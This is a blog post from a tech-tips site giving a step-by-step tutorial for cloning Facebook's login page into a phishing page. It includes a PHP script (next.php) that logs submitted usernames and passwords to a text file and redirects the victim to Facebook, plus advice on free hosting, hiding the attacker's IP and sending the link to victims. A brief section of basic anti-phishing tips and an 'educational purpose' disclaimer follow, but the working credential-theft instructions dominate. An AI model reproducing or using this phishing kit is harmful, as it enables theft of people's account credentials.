• Home
  • Android
    • Android Apps
  • Social Media
    • Facebook
      • Facebook Tricks
      • Secure Facebook account
    • WhatsApp
    • Gmail
    • Instagram
    • Twitter
  • Computer
    • Windows
    • Laptop Tricks and tips
  • Make Money Online
  • How To
    • Useful Computer Apps

Publisher Publisher - Latest Techology updates | Your Technology Partner

Tech Teacher
  • Home
  • Social Media Tricks
  • Facebook
  • Hack Facebook using phishing and preventing
Hack Facebook using phishing and preventing
FacebookFacebook HackingSecure Facebook account

Hack Facebook using phishing and preventing

By Rafi Muhammed A Last updated Apr 2, 2017
1
Share

Hack Facebook using phishing and preventing

How to Hack Facebook using phishing and preventing

This simple article will help you to Hack Facebook using phishing and prevent. Share it with your friends and stay secure online.

I hope you are successfully read our article about Facebook hacking methods and preventing description.

Well now am going to teach you Hack Facebook using phishing and securing method from hackers using phishing.

Hack Facebook using phishing

Read below article, it will teach you how to create a phishing page

Step 1.
We need to make Facebook page login script Go to www.facebook.com (if already logged in just log out)
Right, click on any blank space on the login page. Select “View Page Source”. You will get the source code of Facebook login page Copy that code into Notepad.

Step 2.
Now you have to find (Press ctrl + f) for “action=” in that code. Just copy that without quotes You will find the code like below screenshot

facebook hack using phishing

The big red ring that circles the “action=” You have to change it into ‘action=”next.php” ‘. After you are done, you should modify the method (small red circle on the picture) to “get” instead of “post”, or else it will not work. Save the document as the index.html file.

Step 3.

Now we need to create the “next.php” to store the password. so open the notepad and type the following code:

<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pswrds.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Save this file as “next.Php”

Step 4.

Just create a new notepad file and name it “pswrds.txt” without any contents. Save it.

Now upload those three files( index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must have PHP feature.
Use one of these sites, (free):110mb.com, spam.com justfree.com or 007sites.com.
Use this sites through the secure connection sites(so that you can hide your IP address)

Step 5.

Just send the phishing website link to your victim.

This is the method hackers using phishing. Now am going to tell you this way is the fully cyber crime and here added Only for study purpose. Read below; I’m writing how to escape from phishing and phishing links.

Hack Facebook using phishing

Secure your facebook account from phishing attacks

Step 1.

Always log in with https://www.facebook.com link (must be typed in address bar of your web browser)

Step 2.

avoid external, and harmful links send by any unknown persons

Step 3.

If anyone sends you a link and you redirected to facebook login page(look like) just confirm that the link is facebook.com and it should be secure protocol (https://) in address bar

facebook phishing page

We hope now you have better knowledge about Hack Facebook using phishing and preventing methods. Share with your friends and help them to stay secure. If you have any doubts, Feel free to contact us. We will help you. Thanks for reading hack facebook using phishing. You can comment the doubts about hack facebook using phishing. We will reply you.

 

Note: All our contents are fully created for the educational purpose and do not misuse any of this contents Copyrighted contents Don’t copy without our permissions. just visit copyright policy

facebook hacking methodsfacebook phishing page createfacebook phishing page makefacebook wapka phishing page
1
Share FacebookWhatsAppTwitterGoogle+LINETelegramEmail

Prev Post

Live Stream On Facebook Pages From PC

Next Post

How To Increase Android RAM

Show Comments (1)

Online money making

Earn money online in 2020 minimum 5000INR per day

May 31, 2020

Make Money Online By Network Advertising

Mar 15, 2017

Best PPC (PAY PER CLICK) Ad Networks For Publishers

Mar 15, 2017

Earn Money From Android Apps

Feb 21, 2017

Adsense Approving method 2016

Oct 15, 2016

Earn Money online 10 Methods! tecfever article

Oct 15, 2016
  • About Us
  • Privacy Policy
  • Sitemap
© 2021 - Tech Teacher. All Rights Reserved.
Website Design: BetterStudio
Sign in

Welcome, Login to your account.

Forget password?
Sign in

Recover your password.

A password will be e-mailed to you.